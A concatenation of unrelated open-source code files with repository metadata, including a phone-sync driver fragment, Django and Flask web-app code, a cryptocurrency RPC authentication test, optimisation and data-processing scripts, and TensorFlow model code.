self.setmode(self.MODEMODEM)
self.charset_ascii()
self._wallpaper_mode()
media=result.get('wallpapers', {})
media_index=result.get('wallpaper-index', {})
media_names=[x['name'] for x in media.values()]
index_names=[x['name'] for x in media_index.values()]
del_names=[x for x in index_names if x not in media_names]
new_names=[x for x in media_names if x not in index_names]
self._del_media_files(del_names)
names_to_keys={}
for k,e in media.items():
names_to_keys[e['name']]=k
self._add_wallpapers(new_names, names_to_keys, media)
return result
def getmemo(self, result):
self.log('Reading Memo')
self.setmode(self.MODEMODEM)
self.charset_ascii()
_req=self.protocolclass.memo_read_req()
_res=self.sendATcommand(_req, self.protocolclass.memo_read_resp)
res={}
for e in _res:
_memo=memo.MemoEntry()
_memo.text=e.text
res[_memo.id]=_memo
result['memo']=res
return res
def savememo(self, result, merge):
self.log('Writing Memo')
self.setmode(self.MODEMODEM)
self.charset_ascii()
_req=self.protocolclass.memo_del_req()
for i in range(self.protocolclass.MEMO_MIN_INDEX,
self.protocolclass.MEMO_MAX_INDEX+1):
_req.index=i
try:
self.sendATcommand(_req, None)
except:
pass
_memo_dict=result.get('memo', {})
_keys=_memo_dict.keys()
_keys.sort()
_req=self.protocolclass.memo_write_req()
for k in _keys:
_req.text=_memo_dict[k].text
try:
self.sendATcommand(_req, None)
except:
self.log('Failed to write memo %s'%_req.text)
return _memo_dict
def _process_sms(self, _resp, res):
for i in range(0, len(_resp), 2):
try:
_entry=self.protocolclass.sms_msg_list_header()
_buf=prototypes.buffer(_resp[i])
_entry.readfrombuffer(_buf)
_sms=sms.SMSEntry()
if _entry.msg_type==self.protocolclass.SMS_MSG_REC_UNREAD or \
_entry.msg_type==self.protocolclass.SMS_MSG_REC_READ:
_sms._from=_entry.address
_sms.folder=sms.SMSEntry.Folder_Inbox
_sms.read=_entry.msg_type==self.protocolclass.SMS_MSG_REC_READ
elif _entry.msg_type==self.protocolclass.SMS_MSG_STO_SENT:
_sms.add_recipient(_entry.address)
_sms.folder=sms.SMSEntry.Folder_Sent
elif _entry.msg_type==self.protocolclass.SMS_MSG_STO_UNSENT:
_sms.folder=sms.SMSEntry.Folder_Saved
_sms.add_recipient(_entry.address)
else:
self.log('Unknown message type: %s'%_entry.msg_type)
_sms=None
if _sms:
if _entry.timestamp:
_sms.datetime=_entry.timestamp
_sms.text=_resp[i+1]
res[_sms.id]=_sms
except:
if __debug__:
raise
return res
def getsms(self, result):
self.log('Getting SMS Messages')
self.setmode(self.MODEMODEM)
self.charset_ascii()
res={}
_req=self.protocolclass.sms_format_req()
self.sendATcommand(_req, None)
self.log('Getting SMS messages from the phone memory')
_sms_mem=self.protocolclass.sms_memory_select_req()
_sms_mem.list_memory=self.protocolclass.SMS_MEMORY_PHONE
self.sendATcommand(_sms_mem, None)
_list_sms=self.protocolclass.sms_msg_list_req()
_resp=self.sendATcommand(_list_sms, None)
self._process_sms(_resp, res)
self.log('Getting SMS message from the SIM card')
_sms_mem.list_memory=self.protocolclass.SMS_MEMORY_SIM
self.sendATcommand(_sms_mem, None)
_resp=self.sendATcommand(_list_sms, None)
self._process_sms(_resp, res)
try:
self.sendATcommand(_sms_mem, None)
except commport.ATError:
pass
result['sms']=res
return result
def _get_history_calls(self, log_str, call_type, min_idx, max_idx):
self.log(log_str)
_sel_mem=self.protocolclass.select_storage_req()
_sel_mem.storage=call_type
self.sendATcommand(_sel_mem, None)
_list_pb=self.protocolclass.read_phonebook_req()
_list_pb.start_index=min_idx
_list_pb.end_index=max_idx
self.sendATcommand(_list_pb, None)
def getcallhistory(self, result):
self.log('Getting Call History')
self.setmode(self.MODEMODEM)
self.charset_ascii()
res={}
for l in self.protocolclass.PB_CALL_HISTORY_INFO:
self._get_history_calls(*l)
result['call_history']=res
return result
parent_profile=com_gsm.Profile
class Profile(parent_profile):
serialsname=Phone.serialsname
WALLPAPER_WIDTH=128
WALLPAPER_HEIGHT=128
MAX_WALLPAPER_BASENAME_LENGTH=19
WALLPAPER_FILENAME_CHARS="abcdefghijklmnopqrstuvwxyz0123456789_ ."
WALLPAPER_CONVERT_FORMAT="jpg"
MAX_RINGTONE_BASENAME_LENGTH=19
RINGTONE_FILENAME_CHARS="abcdefghijklmnopqrstuvwxyz0123456789_ ."
RINGTONE_LIMITS= {
'MAXSIZE': 20480
}
phone_manufacturer='LGE'
phone_model='G4015'
usbids=( ( 0x10AB, 0x10C5, 1),
)
deviceclasses=("serial",)
imageorigins={}
imageorigins.update(common.getkv(parent_profile.stockimageorigins, "images"))
imagetargets={}
imagetargets.update(common.getkv(parent_profile.stockimagetargets, "wallpaper",
{'width': 128, 'height': 128, 'format': "JPEG"}))
def GetImageOrigins(self):
return self.imageorigins
def GetTargetsForImageOrigin(self, origin):
if origin=='images':
return self.imagetargets
def __init__(self):
parent_profile.__init__(self)
_supportedsyncs=(
('phonebook', 'read', None), # all phonebook reading
('phonebook', 'write', 'OVERWRITE'), # only overwriting phonebook
('calendar', 'read', None), # all calendar reading
('calendar', 'write', 'OVERWRITE'), # only overwriting calendar
('ringtone', 'read', None), # all ringtone reading
('ringtone', 'write', 'OVERWRITE'),
('wallpaper', 'read', None), # all wallpaper reading
('wallpaper', 'write', 'OVERWRITE'),
('memo', 'read', None), # all memo list reading DJP
('memo', 'write', 'OVERWRITE'), # all memo list writing DJP
('sms', 'read', None), # all SMS list reading DJP
('call_history', 'read', None),
)
def convertphonebooktophone(self, helper, data):
return data
|
[
"joliebig@fim.uni-passau.de"
] |
joliebig@fim.uni-passau.de
|
807f765e562c91b7b553d54b94e18b572bf55c33
|
6f94db52103adeee9727d795ca1ba0b9d98f096f
|
/geodjango/api/serializer.py
|
dcf71d5dcd9c61c90253300244984896dd8c66f0
|
[] |
no_license
|
dannybombastic/vozplus
|
a15fa5a13f39b749479bdc39ad87062b50f775a7
|
b338809797f874388bbff270dea1c342e9d0fa56
|
refs/heads/master
| 2022-12-10T12:53:27.441115
| 2018-08-01T08:52:39
| 2018-08-01T08:52:39
| 143,129,291
| 0
| 0
| null | 2022-12-08T02:25:12
| 2018-08-01T08:48:10
|
Python
|
UTF-8
|
Python
| false
| false
| 2,312
|
py
|
from django.contrib.auth.models import User, Group
from rest_framework import serializers, exceptions
from django.contrib.gis.db import models
from django.contrib.auth import authenticate, login
from .models import Laptop, MenbersPoint
from rest_framework_gis.serializers import GeoFeatureModelSerializer
# Create your models here.
class UserSerializer(serializers.HyperlinkedModelSerializer):
password = serializers.CharField(write_only=True)
class Meta:
model = User
fields = ('url', 'username', 'email', 'groups','password')
def create(self, validated_data):
user = super(UserSerializer, self).create(validated_data)
user.set_password(validated_data['password'])
user.save()
return user
class GroupSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Group
fields = ('url', 'name')
class CordenateMenbersSerializer(GeoFeatureModelSerializer):
class Meta:
model = MenbersPoint
geo_field = 'point'
fields = '__all__'
class LoginSerializer(serializers.Serializer):
class Meta:
model = User
fields = '__all__'
username = serializers.CharField()
password = serializers.CharField()
def validate(self,data):
username = data.get("username","")
password = data.get("password","")
if username and password:
user = authenticate(username = username, password = password)
if user:
if user.is_active:
data["user"] = user
else:
msg = 'User is deactivate'
raise exceptions.ValidationError(msg)
else:
msg = 'Unable to login with credentials'
raise exceptions.ValidationError(msg)
else:
msg = 'Must provide username and password'
raise exceptions.ValidationError(msg)
return data
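# Hypothetical usage in a view (login is already imported above):
# serializer = LoginSerializer(data=request.data)
# serializer.is_valid(raise_exception=True)
# login(request, serializer.validated_data["user"])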
class CordenateLaptopSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Laptop
fields = '__all__'
|
[
"root@tough-cough.com"
] |
root@tough-cough.com
|
ba1172395def777d712bd499abc3f9b9c2a962b1
|
6d8b11a7a056963fc976d61c1a1050888bb43218
|
/main.py
|
1421bed6d2feae3ca3def9f47642253ad02d9057
|
[] |
no_license
|
RubenJacobse/test
|
ad60e324c6b161a3f26614245291d31081a2478d
|
de6ca9154ed84f0ebf56395d51431cb28cfdd93c
|
refs/heads/master
| 2021-10-08T11:44:15.034664
| 2018-12-11T22:54:48
| 2018-12-11T22:54:48
| 107,828,990
| 0
| 0
| null | 2017-10-22T01:44:05
| 2017-10-22T01:36:55
| null |
UTF-8
|
Python
| false
| false
| 90
|
py
|
def print_hello():
print("Hello World!")
if __name__ == "__main__":
print_hello()
|
[
"ruben_jacobse@hotmail.com"
] |
ruben_jacobse@hotmail.com
|
7277918ec75809a8a71b8275b98e117a96846ba6
|
2b167e29ba07e9f577c20c54cb943861d0ccfa69
|
/numerical_analysis_backup/small-scale-multiobj/pareto2/backup_arch4_pod100_new/pareto19.py
|
de8f21e817aca14a05b627e5caf903f8d4b0192a
|
[] |
no_license
|
LiYan1988/kthOld_OFC
|
17aeeed21e195d1a9a3262ec2e67d6b1d3f9ff0f
|
b1237577ea68ad735a65981bf29584ebd889132b
|
refs/heads/master
| 2021-01-11T17:27:25.574431
| 2017-01-23T05:32:35
| 2017-01-23T05:32:35
| 79,773,237
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,949
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 4 15:15:10 2016
@author: li
optimize both throughput and connections
"""
#import sys
#sys.path.insert(0, '/home/li/Dropbox/KTH/numerical_analysis/ILPs')
import csv
from gurobipy import *
import numpy as np
from arch4_decomposition_new import Arch4_decompose
np.random.seed(2010)
num_cores=3
num_slots=80
i = 19
time_limit_routing = 2400 # 1000
time_limit_sa = 108 # 10800
filename = 'traffic_matrix_'+str(i)+'.csv'
# print filename
tm = []
with open(filename) as f:
reader = csv.reader(f)
for idx, row in enumerate(reader):
if idx>11:
row.pop()
row = [float(u) for u in row]
tm.append(row)
tm = np.array(tm)*25
#%% arch4
betav = np.arange(0.0001,0.005,0.0001)
connection_ub = []
throughput_ub = []
connection_lb = []
throughput_lb = []
obj_ub = []
obj_lb = []
for beta in betav:
m = Arch4_decompose(tm, num_slots=num_slots, num_cores=num_cores,alpha=1,beta=beta)
m.create_model_routing(mipfocus=1,timelimit=time_limit_routing,mipgap=0.01, method=2)
m.sa_heuristic(ascending1=False,ascending2=False)
connection_ub.append(m.connections_ub)
throughput_ub.append(m.throughput_ub)
obj_ub.append(m.alpha*m.connections_ub+m.beta*m.throughput_ub)
connection_lb.append(m.obj_sah_connection_)
throughput_lb.append(m.obj_sah_throughput_)
obj_lb.append(m.alpha*m.obj_sah_connection_+m.beta*m.obj_sah_throughput_)
# print m.obj_sah_/float(m.alpha*m.connections_ub+m.beta*m.throughput_ub)
result = np.array([betav,connection_ub,throughput_ub,obj_ub,
connection_lb,throughput_lb,obj_lb]).T
file_name = "result_pareto_arch4_pod100_nf_{}.csv".format(i)
with open(file_name, 'w') as f:
writer = csv.writer(f, delimiter=',')
writer.writerow(['beta', 'connection_ub', 'throughput_ub',
'obj_ub', 'connection_lb', 'throughput_lb', 'obj_lb'])
writer.writerows(result)
|
[
"li.yan.ly414@gmail.com"
] |
li.yan.ly414@gmail.com
|
cebc2086404383471286d8b1b71e54e5c281e023
|
c874e55ec73043f6b837601cc58d855d37649e59
|
/avbernat/All_Morphology/update_on_04.20.2020/all_morph-Autumn2019.py
|
be4b5cca643de276216485f02507d4426d0bf064
|
[] |
no_license
|
mlcenzer/SBB-dispersal
|
85c54c924b399834a798d700cabf0b2702ae0755
|
1a777370986f83186180552a09149dfba72b96d0
|
refs/heads/master
| 2022-12-11T10:13:32.416530
| 2022-12-03T16:23:52
| 2022-12-03T16:23:52
| 229,098,494
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,446
|
py
|
import os
import csv
from datetime import datetime, date
all_morph = r"/Users/anastasiabernat/Desktop/allmorph/morph_to_cp.csv" # nearly complete file, but missing dates
demographics_data = r"/Users/anastasiabernat/Desktop/allmorph/bug_demographics_data_coor.csv" # file with sites so can match site-dates to site-IDs
field_date_collected_dict = {"NW 10th Ave & 18th St": "10.06.2019", # GV
"SW 296th St & 182nd Ave": "10.04.2019", # HS
"JP Grove": "10.04.2019", # KL
"Barber shop": "10.05.2019", # LP
"Polk": "10.05.2019", # LW
"Veteranโs Memorial Park": "10.05.2019", # LB
"MM165": "10.02.2019",
"Charlemagne": "10.02.2019",
"Dynamite Docks": "10.02.2019",
"DD front": "10.02.2019",
"Dagny 1/2 Loop": "10.03.2019",
"Carysfort Cr": "10.03.2019",
"N. Dagny": "10.03.2019",
"Founder's #1": "10.02.2019", # PK
"Founder's #2": "10.02.2019", # PK
"Dagny Trellis": "10.03.2019",
"DD -inter": "10.02.2019", # unkown
"DD": "10.02.2019"}
def diff_month(d1, d2):
return (d1.year - d2.year) * 12 + (d1.month - d2.month)
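# e.g. diff_month(date(2019, 10, 4), date(2013, 5, 1)) == (2019-2013)*12 + (10-5) == 77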
date_dict = {} # Creates a dictionary with ID's as the keys and dates as the values
with open(demographics_data, "r") as demo_data:
reader = csv.DictReader(demo_data)
for row in reader:
ID = row["ID"]
site = row["site"]
if ID not in date_dict:
try:
date_dict[ID] = field_date_collected_dict[(site)]
except KeyError:
print("KeyError for ID, ", ID)
print("KeyError for site, ", site)
#print(date_dict)
full_data = []
with open(all_morph, "r") as morph_data:
reader = csv.DictReader(morph_data)
for r in reader:
ID_num = r["\ufeffID"]
try:
date = date_dict[(ID_num)]
except KeyError:
print("KeyError for ID, ", ID_num)
continue
date_object = datetime.strptime(date, '%m.%d.%Y').date()
start_str = "05.01.2013" # This will need to be changed once we know the exact date. 'True' starting month of allmorph datasheet
start_date = datetime.strptime(start_str, '%m.%d.%Y').date()
        months_since_month_zero = diff_month(date_object, start_date)
        r.pop('date')  # replace the raw date column with months elapsed
        r["months_since_month_zero"] = months_since_month_zero
r["field_date_collected"] = date
full_data.append(r)
#print(full_data[0:5])
outpath = r"/Users/anastasiabernat/Desktop/allmorph/allmorphology_newfieldbugs-edited.csv"
ordered_header = ["\ufeffID", "pophost", "population", "sex", "beak", "thorax", "wing", "body", "month", "year",
"months_since_month_zero", "season", "w_morph", "lat", "long", "diapause",
"field_date_collected", "notes", "date_measured", "date_entered", "recorder"]
with open(outpath, "w") as output_file:
writer = csv.DictWriter(output_file, fieldnames = ordered_header)
writer.writeheader()
for r in full_data:
writer.writerow(r)
|
[
"anastasiabernat@Anastasias-MacBook-Pro.local"
] |
anastasiabernat@Anastasias-MacBook-Pro.local
|
bd8b7e39ecd5539a3b0f06ea57335f802db1f60e
|
301bdb50009961c35494df9fb43625c262047a17
|
/qa/rpc-tests/multi_rpc.py
|
69902992e5f52404415d487fb4e79df3b5d157a5
|
[
"MIT"
] |
permissive
|
franklee1/master4
|
e6a10bcf068259aab70f886cd1dac50261deda73
|
a82cf06267de12b685390c26075e3debfd937788
|
refs/heads/master
| 2021-05-11T13:21:19.785228
| 2018-01-16T11:57:01
| 2018-01-16T11:57:01
| 117,677,623
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,593
|
py
|
#!/usr/bin/env python2
# Copyright (c) 2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test mulitple rpc user config option rpcauth
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import base64
try:
import http.client as httplib
except ImportError:
import httplib
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
class HTTPBasicsTest (BitcoinTestFramework):
def setup_nodes(self):
return start_nodes(4, self.options.tmpdir)
def setup_chain(self):
print("Initializing test directory "+self.options.tmpdir)
initialize_chain(self.options.tmpdir)
#Append rpcauth to master.conf before initialization
rpcauth = "rpcauth=rt:93648e835a54c573682c2eb19f882535$7681e9c5b74bdd85e78166031d2058e1069b3ed7ed967c93fc63abba06f31144"
rpcauth2 = "rpcauth=rt2:f8607b1a88861fac29dfccf9b52ff9f$ff36a0c23c8c62b4846112e50fa888416e94c17bfd4c42f88fd8f55ec6a3137e"
with open(os.path.join(self.options.tmpdir+"/node0", "master.conf"), 'a') as f:
f.write(rpcauth+"\n")
f.write(rpcauth2+"\n")
def run_test(self):
##################################################
# Check correctness of the rpcauth config option #
##################################################
url = urlparse.urlparse(self.nodes[0].url)
#Old authpair
authpair = url.username + ':' + url.password
#New authpair generated via share/rpcuser tool
rpcauth = "rpcauth=rt:93648e835a54c573682c2eb19f882535$7681e9c5b74bdd85e78166031d2058e1069b3ed7ed967c93fc63abba06f31144"
password = "cA773lm788buwYe4g4WT+05pKyNruVKjQ25x3n0DQcM="
#Second authpair with different username
rpcauth2 = "rpcauth=rt2:f8607b1a88861fac29dfccf9b52ff9f$ff36a0c23c8c62b4846112e50fa888416e94c17bfd4c42f88fd8f55ec6a3137e"
password2 = "8/F3uMDw4KSEbw96U3CA1C4X05dkHDN2BPFjTgZW4KI="
authpairnew = "rt:"+password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = httplib.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, False)
conn.close()
#Use new authpair to confirm both work
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = httplib.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, False)
conn.close()
#Wrong login name with rt's password
authpairnew = "rtwrong:"+password
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = httplib.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, True)
conn.close()
#Wrong password for rt
authpairnew = "rt:"+password+"wrong"
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = httplib.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, True)
conn.close()
#Correct for rt2
authpairnew = "rt2:"+password2
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = httplib.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, False)
conn.close()
#Wrong password for rt2
authpairnew = "rt2:"+password2+"wrong"
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = httplib.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, True)
conn.close()
if __name__ == '__main__':
HTTPBasicsTest ().main ()
|
[
"franklee85@live.com"
] |
franklee85@live.com
|
f7d6509abcaf4a031583b345b0880baf361bc352
|
c60703a79835fc05aec549d64bf9eedebbcbd20a
|
/app/models.py
|
6ec03c8dfd6f053b6f962a5e0fddaa23b9ac3deb
|
[
"MIT"
] |
permissive
|
Abdisamad100/pitches
|
2dcd25a2d9fcc1e1a5a0b110e1577f1c2c8cae0b
|
17f816fa2aa9e697c663afe7839e4108275da8c6
|
refs/heads/master
| 2023-02-02T14:25:58.945931
| 2020-12-16T11:44:27
| 2020-12-16T11:44:27
| 318,565,473
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,444
|
py
|
from . import db
from werkzeug.security import generate_password_hash,check_password_hash
from flask_login import UserMixin
from . import login_manager
from datetime import datetime
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
#...
class User(UserMixin,db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer,primary_key = True)
username = db.Column(db.String(255),index = True)
email = db.Column(db.String(255),unique = True,index = True)
bio = db.Column(db.String(255))
profile_pic_path = db.Column(db.String())
pass_secure = db.Column(db.String(255))
@property
def password(self):
raise AttributeError('You cannot read the password attribute')
@password.setter
def password(self, password):
self.pass_secure = generate_password_hash(password)
def verify_password(self,password):
return check_password_hash(self.pass_secure,password)
def __repr__(self):
return f'User {self.username}'
class Pitches(db.Model):
__tablename__= 'pitches'
id = db.Column(db.Integer,primary_key = True)
title = db.Column(db.String(255))
category = db.Column(db.String(255))
pitch = db.Column(db.String(255))
date = db.Column(db.DateTime(250), default=datetime.utcnow)
user_id = db.Column(db.Integer, db.ForeignKey("users.id"))
comments = db.relationship('Comments', backref='title', lazy='dynamic')
def save_pitch(self):
db.session.add(self)
db.session.commit()
@classmethod
def get_pitches(cls,cate):
pitch = Pitches.query.filter_by(category=cate).all()
return pitch
    def __repr__(self):
        return f"Pitches('{self.pitch}', '{self.date}')"
class Comments(db.Model):
__tablename__ = 'comments'
id = db.Column(db.Integer, primary_key=True)
comment = db.Column(db.String(255))
date_posted = db.Column(db.DateTime(250), default=datetime.utcnow)
pitches_id = db.Column(db.Integer, db.ForeignKey("pitches.id"))
user_id = db.Column(db.Integer, db.ForeignKey("users.id"))
def save_comment(self):
db.session.add(self)
db.session.commit()
@classmethod
def get_comment(cls,id):
comments = Comments.query.filter_by(pitches_id=id).all()
return comments
def __repr__(self):
return f"Comments('{self.comment}', '{self.date_posted}')"
|
[
"abdisamadcade004@gmail.com"
] |
abdisamadcade004@gmail.com
|
3c24799c5db4e119676f9a6ba6df045d88501c4b
|
78b430738a078e2bbd75140aa05c5dd19d0086cf
|
/tf114/tf19_cnn4_cifa10.py
|
171b7b7013abf4bb0e1bda55dab2bbe176a4cd45
|
[] |
no_license
|
silvermund/keras-study
|
b1a453b9427364f7f7f6ed095ea3a7d2dc0a8ea1
|
948a02d10d53d9e4450f9164cf2835f0b24574e2
|
refs/heads/main
| 2023-07-16T05:01:45.702395
| 2021-09-01T02:12:36
| 2021-09-01T02:12:36
| 383,711,628
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,650
|
py
|
# Exercise:
# build a CNN for CIFAR-10
# target accuracy: 0.7 or higher
import tensorflow as tf
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, MaxPool2D
tf.compat.v1.disable_eager_execution()
print(tf.executing_eagerly()) # False
print(tf.__version__) # 1.14.0 -> 2.4.1
# tf.set_random_seed(66)
# 1. Data
from keras.datasets import cifar10
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
from keras.utils import to_categorical
y_train = to_categorical(y_train)
y_test = to_categorical(y_test)
x_train = x_train.reshape(50000, 32, 32, 3).astype('float32')/255
x_test = x_test.reshape(10000, 32, 32, 3).astype('float32')/255
learning_rate = 0.0002
training_epochs = 20
batch_size = 100
total_batch = int(len(x_train)/batch_size)
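# 50000 training images / batch_size 100 -> total_batch of 500 per epoch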
x = tf.compat.v1.placeholder(tf.float32, [None, 32, 32, 3])
y = tf.compat.v1.placeholder(tf.float32, [None, 10])
# 2. Build the model
# layer1
W1 = tf.compat.v1.get_variable('W1', shape=[3, 3, 3, 32])
# [filter_height, filter_width, in_channels, out_channels]
print(W1) # (3, 3, 3, 32)
L1 = tf.nn.conv2d(x, W1, strides=[1,1,1,1], padding='SAME')
L1 = tf.nn.relu(L1)
L1_maxpool = tf.nn.max_pool(L1, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
# Keras equivalent of layer1, for reference:
# model = Sequential()
# model.add(Conv2D(filters=32, kernel_size=(3,3), strides=1,
#                  padding='valid', input_shape=(28, 28, 1),  # (rows, cols, channels)
#                  activation='relu'))
# model.add(MaxPool2D())
print(L1) # (?, 32, 32, 32)
print(L1_maxpool) # (?, 16, 16, 32)
# layer2
W2 = tf.compat.v1.get_variable('W2', shape=[3, 3, 32, 64])
L2 = tf.nn.conv2d(L1_maxpool, W2, strides=[1,1,1,1], padding='SAME')
L2 = tf.nn.selu(L2)
L2_maxpool = tf.nn.max_pool(L2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
print(L2) # (?, 16, 16, 64)
print(L2_maxpool) # (?, 8, 8, 64)
# layer3
W3 = tf.compat.v1.get_variable('W3', shape=[3, 3, 64, 128])
L3 = tf.nn.conv2d(L2_maxpool, W3, strides=[1,1,1,1], padding='SAME')
L3 = tf.nn.selu(L3)
L3_maxpool = tf.nn.max_pool(L3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
print(L3) # (?, 8, 8, 128)
print(L3_maxpool) # (?, 4, 4, 128)
# layer4
W4 = tf.compat.v1.get_variable('W4', shape=[2, 2, 128, 64],)
# initializer=tf.contrib.layers.xavier_initializer())
L4 = tf.nn.conv2d(L3_maxpool, W4, strides=[1,1,1,1], padding='VALID')
L4 = tf.nn.leaky_relu(L4)
L4_maxpool = tf.nn.max_pool(L4, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
print(L4) # (?, 3, 3, 64)
print(L4_maxpool) # (?, 2, 2, 64)
# Flatten
L_flat = tf.reshape(L4_maxpool, [-1, 2*2*64])
print("Flatten", L_flat) # (?, 256)
# layer5 DNN
W5 = tf.compat.v1.get_variable('W5', shape=[2*2*64, 64],)
# initializer=tf.contrib.layers.xavier_initializer())
B5 = tf.Variable(tf.random.normal([64]), name='B1')
L5 = tf.matmul(L_flat, W5) + B5
L5 = tf.nn.selu(L5)
# L5 = tf.nn.dropout(L5, keep_prob=0.2)
print(L5) # (?, 64)
# layer6 DNN
W6 = tf.compat.v1.get_variable("W6", shape=[64, 32])
B6 = tf.Variable(tf.random.normal([32]), name='B2')
L6 = tf.matmul(L5, W6) + B6
L6 = tf.nn.selu(L6)
# L6 = tf.nn.dropout(L6, keep_prob=0.2)
print(L6) # (?, 32)
# layer7 Softmax
W7 = tf.compat.v1.get_variable("W7", shape=[32, 10])
B7 = tf.Variable(tf.random.normal([10]), name='B3')
L7 = tf.matmul(L6, W7) + B7
hypothesis = tf.nn.softmax(L7)
print(hypothesis) # (?, 10)
# 3. Compile and train
# categorical_crossentropy
loss = tf.reduce_mean(-tf.reduce_sum(y*tf.math.log(hypothesis), axis=1))
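# Note: taking log of an explicit softmax can underflow for confident wrong
# predictions; tf.nn.softmax_cross_entropy_with_logits_v2(labels=y, logits=L7)
# is the fused, numerically safer equivalent (kept manual here to show the formula).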
optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss)
sess = tf.compat.v1.Session()
sess.run(tf.compat.v1.global_variables_initializer())
# learning_rate = 0.001
# training_epochs = 15
# batch_size = 100
# total_batch = int(len(x_train)/batch_size)
for epoch in range(training_epochs):
avg_loss = 0
    for i in range(total_batch): # loop over the mini-batches in this epoch (500)
start = i * batch_size
end = start + batch_size
batch_x, batch_y = x_train[start:end], y_train[start:end]
feed_dict = {x:batch_x, y:batch_y}
batch_loss, _ = sess.run([loss, optimizer], feed_dict=feed_dict)
avg_loss += batch_loss/total_batch
print('Epoch : ', '%04d' %(epoch + 1), 'loss : {:.9f}'.format(avg_loss))
print("ํ๋ จ ๋")
prediction = tf.equal(tf.compat.v1.arg_max(hypothesis, 1), tf.compat.v1.argmax(y,1))
accuracy = tf.reduce_mean(tf.cast(prediction, tf.float32))
print('ACC : ', sess.run(accuracy, feed_dict={x:x_test, y:y_test}))
# target: 0.7 or higher
# ACC : 0.7079
|
[
"cliferd@naver.com"
] |
cliferd@naver.com
|
95d1c581109e4eb8c4580ae22f4f9f6059a36834
|
c45e36421992436f1234ddf5088c1c12a576209e
|
/autoshop_project/car_models/urls.py
|
64ac0132345907cfebda6f5062e8a8bbecbdf270
|
[] |
no_license
|
dimavitvickiy/autoshop
|
e897fd67e61030e87c60e548f43178741f09dbf1
|
2c6228ae6c004b6f5ee28dfbf9afabee311fc360
|
refs/heads/master
| 2021-01-11T08:02:13.040752
| 2017-10-24T11:16:35
| 2017-10-24T11:16:35
| 72,923,746
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 456
|
py
|
from django.conf.urls import url
from . import views as model_views
urlpatterns = [
url(r'^create$', model_views.car_model_create, name='create'),
url(r'^$', model_views.car_model_list, name='list'),
url(r'^(?P<slug>[\w-]+)/$', model_views.car_model_detail, name='detail'),
url(r'^(?P<slug>[\w-]+)/delete$', model_views.car_model_delete, name='delete'),
url(r'^(?P<slug>[\w-]+)/update', model_views.car_model_update, name='update'),
]
|
[
"dimavitvickiy@gmail.com"
] |
dimavitvickiy@gmail.com
|
98cd5ad237fa3b9eeb6fd7632584c85ec67ea736
|
0e3a9758175f37e4d702ff6ccd6d2ee2e91f727f
|
/deepiu/textsum/inputs/default/input.py
|
7bd4d6525e0a6f7bdbde178777e15637e93ef6f3
|
[] |
no_license
|
hitfad/hasky
|
94d7248f21a1ec557a838b77987e34b77fb9a0c7
|
c1d2d640643037c62d64890c40de36ba516eb167
|
refs/heads/master
| 2021-01-20T22:55:36.778378
| 2017-08-29T13:23:50
| 2017-08-29T13:23:50
| 101,830,092
| 1
| 0
| null | 2017-08-30T02:48:35
| 2017-08-30T02:48:35
| null |
UTF-8
|
Python
| false
| false
| 2,351
|
py
|
#!/usr/bin/env python
# ==============================================================================
# \file input.py
# \author chenghuige
# \date 2016-08-17 23:50:47.335840
# \Description
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import melt
import conf
from conf import TEXT_MAX_WORDS, INPUT_TEXT_MAX_WORDS
def _decode(example, parse, dynamic_batch_length):
features = parse(
example,
features={
'ltext_str': tf.FixedLenFeature([], tf.string),
'ltext': tf.VarLenFeature(tf.int64),
'rtext_str': tf.FixedLenFeature([], tf.string),
'rtext': tf.VarLenFeature(tf.int64),
})
text = features['rtext']
input_text = features['ltext']
maxlen = 0 if dynamic_batch_length else TEXT_MAX_WORDS
text = melt.sparse_tensor_to_dense(text, maxlen)
  # For attention to be numerically stable (and since encode length barely
  # affects speed), the dynamic rnn encoder just packs zeros at the end.
  # Encoding attention with a long fixed batch length does hurt speed though:
